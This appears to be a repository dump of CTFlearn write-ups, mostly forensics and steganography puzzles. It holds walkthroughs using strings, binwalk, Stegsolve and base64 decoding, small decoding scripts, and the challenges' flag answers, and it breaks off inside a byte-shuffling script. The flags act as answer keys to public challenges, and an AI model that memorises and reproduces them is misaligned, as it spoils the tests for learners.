https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/PDF by fdpumyp/dontopen.pdf -------------------------------------------------------------------------------- /Forensics/Pho Is Tasty!/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Pho Is Tasty!/Flag.png -------------------------------------------------------------------------------- /Forensics/Pho Is Tasty!/Pho.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Pho Is Tasty!/Pho.jpg -------------------------------------------------------------------------------- /Forensics/Pho Is Tasty!/README.md: -------------------------------------------------------------------------------- 1 | ## Pho Is Tasty! 2 | The main idea finding the flag is see Hex Dump! 3 | 4 | #### Step-1: 5 | After I downloaded `Pho.jpg`, I tried using `strings`, `binwalk`, etc. But no much luck. 6 | 7 | `strings Pho.jpg` output: 8 | ``` 9 | oSamsung 10 | Samsung Galaxy S8 Color Palette: 11 | )$,$!$,$A3--3AK? 19 | 20 | #### Step-3: 21 | Finally the flag becomes: 22 | 23 | [comment]: <> (`CTFlearn{I_Love_Pho!!!}`) 24 | -------------------------------------------------------------------------------- /Forensics/PikesPeak/PikesPeak.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/PikesPeak/PikesPeak.jpg -------------------------------------------------------------------------------- /Forensics/PikesPeak/README.md: -------------------------------------------------------------------------------- 1 | ## PikesPeak 2 | The main idea finding the flag using simple forensic techniques. 3 | 4 | 5 | #### Step-1: 6 | After we download `PikesPeak.jpg`, we try to open and see the flag and check if we find any. 7 | 8 | 9 | 10 | #### Step-2: 11 | I tried simple techniques and easily found answer when we send the command: 12 | 13 | `strings PikesPeak.jpg | grep {` 14 | 15 | I and got this as output: 16 | 17 | ``` 18 | CTFLEARN{PikesPeak} 19 | CTFLearn{Colorado} 20 | %ctflearn{MountainMountainMountain} 21 | #cTfLeArN{CTFMountainCTFmOUNTAIN} 22 | CTF{AsPEN.Vail} 23 | CTFlearn{Gandalf} 24 | ctflearning{AUCKLAND} 25 | ctfLEARN{MtDoom} 26 | 6ctflearninglearning{Mordor.TongariroAlpineCrossing} 27 | +CTFLEARN{MountGedePangrangoNationalPark} 28 | $ctflearncTfLeARN{MountKosciuszko} 29 | {rof 30 | #&f{ 31 | Y\GC{( 32 | {r%681G 33 | {t(@Q 34 | {5$< 35 | )%)`{ 36 | N{eI& 37 | ]N&{ 38 | NKxf{ 39 | K;{Dk 40 | 8pGM{ 41 | d=q{ 42 | |PV{ 43 | xw{1 44 | #{;W 45 | }s7h{ 46 | V{K[\d 47 | b%\{% 48 | ``` 49 | 50 | #### Step-4: 51 | 52 | I tried all the flags up there xP. 53 | 54 | However one of them worked out. 55 | 56 | #### Step-5: 57 | Finally the flag becomes: 58 | 59 | 60 | [comment]: <> (`CTFlearn{Gandalf}`) 61 | -------------------------------------------------------------------------------- /Forensics/QR-code inception/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/QR-code inception/flag.png -------------------------------------------------------------------------------- /Forensics/QR-code inception/flag_qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/QR-code inception/flag_qr.png -------------------------------------------------------------------------------- /Forensics/QR-code inception/inception.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/QR-code inception/inception.png -------------------------------------------------------------------------------- /Forensics/QR-code inception/qr.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import cv2 3 | import numpy as np 4 | import zbar 5 | 6 | scale = 300 7 | scanner = zbar.Scanner() 8 | 9 | def scan(img): 10 | img = np.bitwise_xor(img, ~img[0,0]) 11 | img = cv2.resize(img, (scale * 5, scale * 5), interpolation = cv2.INTER_AREA) 12 | ret = scanner.scan(img) 13 | return ret[0].data if ret else b'' 14 | 15 | img = cv2.imread('inception.png', cv2.IMREAD_GRAYSCALE) 16 | w,h = img.shape 17 | msg = b''.join([scan(img[y:y+scale, x:x+scale]) for y in range(0, h, scale) for x in range(0,w,scale)]) 18 | print("Decoded message: " + msg) -------------------------------------------------------------------------------- /Forensics/Rubber Duck/RubberDuck.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Rubber Duck/RubberDuck.jpg -------------------------------------------------------------------------------- /Forensics/Seeing is believing/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/Flag.png -------------------------------------------------------------------------------- /Forensics/Seeing is believing/README.md: -------------------------------------------------------------------------------- 1 | ## Seeing is believing 2 | The main idea of finding the flag is basic Stego Skills. 3 | 4 | #### Step-1: 5 | After I downloaded `help.me`, I tried `file help.me` on it. I got this: 6 | 7 | ```bash 8 | help.me: Ogg data, Vorbis audio, mono, 44100 Hz, ~110000 bps, created by: Xiph.Org libVorbis 9 | I (1.3.3) 10 | ``` 11 | This is a `ogg` format file. 12 | #### Step-2: 13 | So, I just make a copy and convert its extension to `help (copy).ogg`. 14 | When I played it, it was nothing some gitters. 15 | 16 | #### Step-3: 17 | So, I opened it in [Audacity](https://www.audacityteam.org/). Normally, here I check out in Spectogram view. 18 | 19 | 20 | 21 | 22 | #### Step-4: 23 | We clearly got a barcode there. When I scanned it online, I was taken to this URL: https://pastebin.com/zhEhyp3G 24 | 25 | 26 | #### Step-6: 27 | I found the flag there. 28 | 29 | 30 | 31 | #### Step-8: 32 | Finally, the flag becomes: 33 | `the_flag_is{A_sP3c7r0grAm?!}` -------------------------------------------------------------------------------- /Forensics/Seeing is believing/Spectogram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/Spectogram.png -------------------------------------------------------------------------------- /Forensics/Seeing is believing/message.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/message.zip -------------------------------------------------------------------------------- /Forensics/Seeing is believing/seeingisbelieving/help (copy).ogg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/seeingisbelieving/help (copy).ogg -------------------------------------------------------------------------------- /Forensics/Seeing is believing/seeingisbelieving/help.me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Seeing is believing/seeingisbelieving/help.me -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/0 -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/Gimli04Base.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/Gimli04Base.jpg -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/ShahOfGimli.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/ShahOfGimli.jpg -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/0 -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/20517.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/20517.tar -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/Gimli04Base.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/Gimli04Base.jpg -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/flag.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/flag.enc -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/_ShahOfGimli.jpg.extracted/flag.txt: -------------------------------------------------------------------------------- 1 | CTFlearn{Gimli.Is.A.Warrior} -------------------------------------------------------------------------------- /Forensics/ShahOfGimli/flag.txt: -------------------------------------------------------------------------------- 1 | CTFlearn{Gimli.Is.A.Warrior} -------------------------------------------------------------------------------- /Forensics/Simple Steganography/Minions1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Simple Steganography/Minions1.jpeg -------------------------------------------------------------------------------- /Forensics/Simple Steganography/raw.txt: -------------------------------------------------------------------------------- 1 | AEMAVABGAGwAZQBhAHIAbgB7AHQAaABpAHMAXwBpAHMAXwBmAHUAbgB9 2 | 3 | -------------------------------------------------------------------------------- /Forensics/Smiling ASCII/ALTERNATIVE.md: -------------------------------------------------------------------------------- 1 | ## Smiling ASCII Alternative Solution 2 | The main idea is to find the flag with Stegsolve. 3 | 4 | #### Step-1: 5 | We are given [`smiling.png`](./smiling.png). 6 | 7 | #### Step-2: 8 | If we look at the image in [Stegsolve](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve), we can see interference in all alpha, blue, and green planes: 9 | 10 | 11 | #### Step-3: 12 | If there's interference that means data can be extracted based on the interference. Go to Analyze > Data Extract: 13 | 14 | 15 | #### Step-4: 16 | The flag is: 17 | `CTFlearn{ascii_pixel_flag}` -------------------------------------------------------------------------------- /Forensics/Smiling ASCII/data_extract.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Smiling ASCII/data_extract.png -------------------------------------------------------------------------------- /Forensics/Smiling ASCII/interference.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Smiling ASCII/interference.png -------------------------------------------------------------------------------- /Forensics/Smiling ASCII/smiling.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Smiling ASCII/smiling.png -------------------------------------------------------------------------------- /Forensics/Snowboard/Snowboard.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/Snowboard.jpg -------------------------------------------------------------------------------- /Forensics/Snowboard/_Snowboard.jpg.extracted/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/0 -------------------------------------------------------------------------------- /Forensics/Snowboard/_Snowboard.jpg.extracted/393B: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/393B -------------------------------------------------------------------------------- /Forensics/Snowboard/_Snowboard.jpg.extracted/395D: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/395D -------------------------------------------------------------------------------- /Forensics/Snowboard/_Snowboard.jpg.extracted/3A4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/3A4 -------------------------------------------------------------------------------- /Forensics/Snowboard/_Snowboard.jpg.extracted/5A: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Snowboard/_Snowboard.jpg.extracted/5A -------------------------------------------------------------------------------- /Forensics/Taking LS/README.md: -------------------------------------------------------------------------------- 1 | ## Taking LS 2 | The main idea finding the flag using simple LS commands to find hidden passwords and flag. 3 | 4 | #### Step-1: 5 | After we download the given zip `The Flag.zip` from the cloud, we just try simple techniques. 6 | 7 | After we unzip the 2 folders in it, we get 2 directories named `__MACOSX` & `The Flag`. 8 | 9 | #### Step-2: 10 | I went into `The Flag` directory and tried 11 | `ls -al` command to get following output: 12 | ``` 13 | total 40 14 | drwxr-xr-x 3 rishit rishit 4096 Oct 30 2016 . 15 | drwxr-xr-x 4 rishit rishit 4096 Jul 10 16:13 .. 16 | -rw-r--r-- 1 rishit rishit 6148 Oct 30 2016 .DS_Store 17 | -rw-r--r-- 1 rishit rishit 16647 Oct 30 2016 'The Flag.pdf' 18 | drwxr-xr-x 2 rishit rishit 4096 Oct 30 2016 .ThePassword 19 | ``` 20 | Note: `The Flag.pdf` is password protected. 21 | We need to retrieve the password. 22 | 23 | #### Step-3: 24 | Next, I got into `.ThePassword` directory and tried `ls` command to get this: 25 | 26 | ``` 27 | ThePassword.txt 28 | ``` 29 | 30 | #### Step-4: 31 | Let's do a `cat ThePassword.txt` to get the Password. 32 | 33 | `Nice Job! The Password is "Im The Flag".` 34 | 35 | #### Step-5: 36 | Let's try this password on `The Flag.pdf` and its works! 37 | 38 | #### Step-7: 39 | Finally the flag becomes: 40 | `ABCTF{T3Rm1n4l_is_C00l}` -------------------------------------------------------------------------------- /Forensics/Taking LS/The Flag.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Taking LS/The Flag.zip -------------------------------------------------------------------------------- /Forensics/Taking LS/The Flag/The Flag.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Taking LS/The Flag/The Flag.pdf -------------------------------------------------------------------------------- /Forensics/The Data Scientist/README.md: -------------------------------------------------------------------------------- 1 | ## The Data Scientist 2 | The main idea of getting the flag is using cv2, pandas libraries to get decoded message. 3 | 4 | #### Step-1: 5 | 6 | https://niekgnad.wordpress.com/2020/07/23/ctflearn-solution-the-data-scientist/ 7 | 8 | ```python 9 | 10 | import pandas as pd 11 | import cv2 12 | # The real hint will be given when you found what's the columns mean 13 | df = pd.read_csv('the_data_scientist.csv') 14 | print(''.join([chr(int(round(x))) for x in df.mean()])) 15 | # SET ALL VALUES BETWEEN 64 AND 65 TO BLACK AND SCAN IT 16 | df = (df < 64) | (df > 65) 17 | cv2.imwrite('flag.png', df.to_numpy() * 255); 18 | ``` 19 | 20 | #### Step-2: 21 | Finally, the flag becomes: 22 | `CTFlearn{m4ch1n3_l34rn1n9_rul35}` -------------------------------------------------------------------------------- /Forensics/The Keymaker/The-Keymaker.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/The Keymaker/The-Keymaker.jpg -------------------------------------------------------------------------------- /Forensics/The Keymaker/flag: -------------------------------------------------------------------------------- 1 | CTFlearn{Ne0.TheMatrix} 2 | -------------------------------------------------------------------------------- /Forensics/The Keymaker/flag.enc: -------------------------------------------------------------------------------- 1 | mmtaSHhAsK9pLMepyFDl37UTXQT0CMltZk7+4Kaa1svo5vqb6JuczUqQGFJYiycY 2 | -------------------------------------------------------------------------------- /Forensics/The adventures of Boris Ivanov. Part 1./Boris_Ivanov_1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/The adventures of Boris Ivanov. Part 1./Boris_Ivanov_1.jpg -------------------------------------------------------------------------------- /Forensics/The adventures of Boris Ivanov. Part 1./Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/The adventures of Boris Ivanov. Part 1./Flag.png -------------------------------------------------------------------------------- /Forensics/The adventures of Boris Ivanov. Part 1./README.md: -------------------------------------------------------------------------------- 1 | ## The adventures of Boris Ivanov. Part 1. 2 | The main idea finding the flag is to tangle image RGB filters with Stegsolver. 3 | 4 | #### Step-1: 5 | After downloading `Boris_Ivanov_1.jpg` from the cloud, I tried all basic Forensics Techniques, but I got nothing. 6 | 7 | 8 | 9 | NULL. NATA. ZIP. 10 | 11 | #### Step-2: 12 | 13 | I tried to use the Stegsolver application. For those who don't have it, can get the script from here: 14 | 15 | https://github.com/zardus/ctf-tools/tree/master/stegsolve 16 | 17 | After installation is complete, running `./stegsolver.jar` will launch the application. 18 | 19 | #### Step-3: 20 | 21 | After reading the challenge again and again we can notice the word KGB may bay relate to Steganography by RGB. 22 | 23 | In Stegsolver, there are 1000 offsets possible. 24 | 25 | #### Step-4: 26 | Luckily, after analyzing the image, I started to filter backwards and got flag at 898 offset. 27 | 28 | I got the flag there. 29 | 30 | 31 | 32 | 33 | #### Step-5: 34 | Finally the flag becomes: 35 | `flag{d0nt_m3s5_w1th_th3_KGB}` -------------------------------------------------------------------------------- /Forensics/Tux!/Base64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Tux!/Base64.png -------------------------------------------------------------------------------- /Forensics/Tux!/README.md: -------------------------------------------------------------------------------- 1 | ## Tux! 2 | The main idea finding the flag is get flag using basic Stego skills. 3 | 4 | #### Step-1: 5 | After I downloaded `Tux.jpg`, I tried using `strings`, `binwalk`, etc. But no much luck. 6 | 7 | 8 | 9 | `strings Tux.jpg` output: 10 | ``` 11 | JFIF 12 | 'ICAgICAgUGFzc3dvcmQ6IExpbnV4MTIzNDUK 13 | ``` 14 | #### Step-2: 15 | I got this Base64 encrypted string there, which I tried to decode [here](https://www.base64decode.org/). 16 | 17 | 18 | 19 | #### Step-3: 20 | So, next I tried `binwalk Tux.jpg` and got this: 21 | ```bash 22 | DECIMAL HEXADECIMAL DESCRIPTION 23 | -------------------------------------------------------------------------------- 24 | 0 0x0 JPEG image data, JFIF standard 1.01 25 | 5488 0x1570 Zip archive data, encrypted at least v1.0 to extract, compressed size: 39, uncompressed size: 27, name: flag 26 | 5679 0x162F End of Zip archive, footer length: 22 27 | ``` 28 | 29 | So to unzip the files, I used `binwalk -e Tux.jpg` and got a directory named: `_Tux.jpg.extracted`. 30 | It contained `flag` (Encrypted obviously.) 31 | 32 | 33 | #### Step-4: 34 | So, then I used the password: `Linux12345`, we got after decoding the Base64 string. 35 | 36 | Voila! I got the flag. 37 | #### Step-5: 38 | Finally the flag becomes: 39 | 40 | [comment]: <> (`CTFlearn{Linux_Is_Awesome}`) 41 | 42 | -------------------------------------------------------------------------------- /Forensics/Tux!/Tux.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Tux!/Tux.jpg -------------------------------------------------------------------------------- /Forensics/Tux!/_Tux.jpg.extracted/1570.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Tux!/_Tux.jpg.extracted/1570.zip -------------------------------------------------------------------------------- /Forensics/Tux!/_Tux.jpg.extracted/flag: -------------------------------------------------------------------------------- 1 | CTFlearn{Linux_Is_Awesome} 2 | -------------------------------------------------------------------------------- /Forensics/Up For A Little Challenge?/Begin Hack.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Up For A Little Challenge?/Begin Hack.jpg -------------------------------------------------------------------------------- /Forensics/Up For A Little Challenge?/Did I Forget Again?/Loo Nothing Becomes Useless ack.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Up For A Little Challenge?/Did I Forget Again?/Loo Nothing Becomes Useless ack.jpg -------------------------------------------------------------------------------- /Forensics/Up For A Little Challenge?/Did I Forget Again?/skycoder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Up For A Little Challenge?/Did I Forget Again?/skycoder.jpg -------------------------------------------------------------------------------- /Forensics/Up For A Little Challenge?/Up For A Little Challenge.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Up For A Little Challenge?/Up For A Little Challenge.zip -------------------------------------------------------------------------------- /Forensics/WOW.... So Meta/3UWLBAUCb9Z2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/WOW.... So Meta/3UWLBAUCb9Z2.jpg -------------------------------------------------------------------------------- /Forensics/abandoned place/Hex1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/abandoned place/Hex1.png -------------------------------------------------------------------------------- /Forensics/abandoned place/Hex2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/abandoned place/Hex2.png -------------------------------------------------------------------------------- /Forensics/abandoned place/abondoned_street_challenge2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/abandoned place/abondoned_street_challenge2.jpg -------------------------------------------------------------------------------- /Forensics/abandoned place/abondoned_street_challenge2_altered.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/abandoned place/abondoned_street_challenge2_altered.jpg -------------------------------------------------------------------------------- /Forensics/office flag/flag.odt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/office flag/flag.odt -------------------------------------------------------------------------------- /Forensics/office flag/flag.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/office flag/flag.zip -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Rishit Saiya 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Miscellaneous/Ambush Mission/Base64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Ambush Mission/Base64.png -------------------------------------------------------------------------------- /Miscellaneous/Ambush Mission/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Ambush Mission/Flag.png -------------------------------------------------------------------------------- /Miscellaneous/Ambush Mission/README.md: -------------------------------------------------------------------------------- 1 | ## Ambush Mission 2 | The main idea of finding the flag is Stego and Crypto skills. 3 | 4 | #### Step-1: 5 | After I downloaded `clue.png`, I checked for basic commands like `strings`, `binwalk`, etc. 6 | 7 | 8 | 9 | #### Step-2: 10 | Now, I used [Stegsolve](https://github.com/zardus/ctf-tools/tree/master/stegsolve) to check for any hints. 11 | 12 | #### Step-3: 13 | Luckily, in Red Plane 0, I got encrypted string: `==QTh9lMx8Fd08VZt9FdFNTb`. 14 | 15 | 16 | 17 | If you have slight idea of Base64 encrypted strings, they end with `=` or `==`. So, this string was clearly reversed. 18 | 19 | #### Step-4: 20 | I reversed it online at: https://codebeautify.org/reverse-string 21 | 22 | 23 | 24 | #### Step-5: 25 | Finally again Base64. Looked small. Hoped it would be flag. 26 | 27 | 28 | 29 | #### Step-6: 30 | Finally, the flag becomes: 31 | `flag{m3Et_me_4t_12_aM}` 32 | -------------------------------------------------------------------------------- /Miscellaneous/Ambush Mission/Reversal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Ambush Mission/Reversal.png -------------------------------------------------------------------------------- /Miscellaneous/Ambush Mission/clue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Ambush Mission/clue.png -------------------------------------------------------------------------------- /Miscellaneous/Android, run!/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Android, run!/Flag.png -------------------------------------------------------------------------------- /Miscellaneous/Android, run!/Run.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Android, run!/Run.apk -------------------------------------------------------------------------------- /Miscellaneous/F1L3 M1X3R/Flag.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/F1L3 M1X3R/Flag.jpeg -------------------------------------------------------------------------------- /Miscellaneous/F1L3 M1X3R/Repair.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/F1L3 M1X3R/Repair.png -------------------------------------------------------------------------------- /Miscellaneous/F1L3 M1X3R/Unrepair.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/F1L3 M1X3R/Unrepair.png -------------------------------------------------------------------------------- /Miscellaneous/F1L3 M1X3R/exploit.py: -------------------------------------------------------------------------------- 1 | #! usr/bin/python3 2 | 3 | # Reading the bytes 4 | with open("fl4g.jpeg", "rb") as file: 5 | OFFSET = 4 6 | sig_rev = b"" 7 | sig_read = bytearray(file.read(OFFSET)) 8 | 9 | # Cyclic 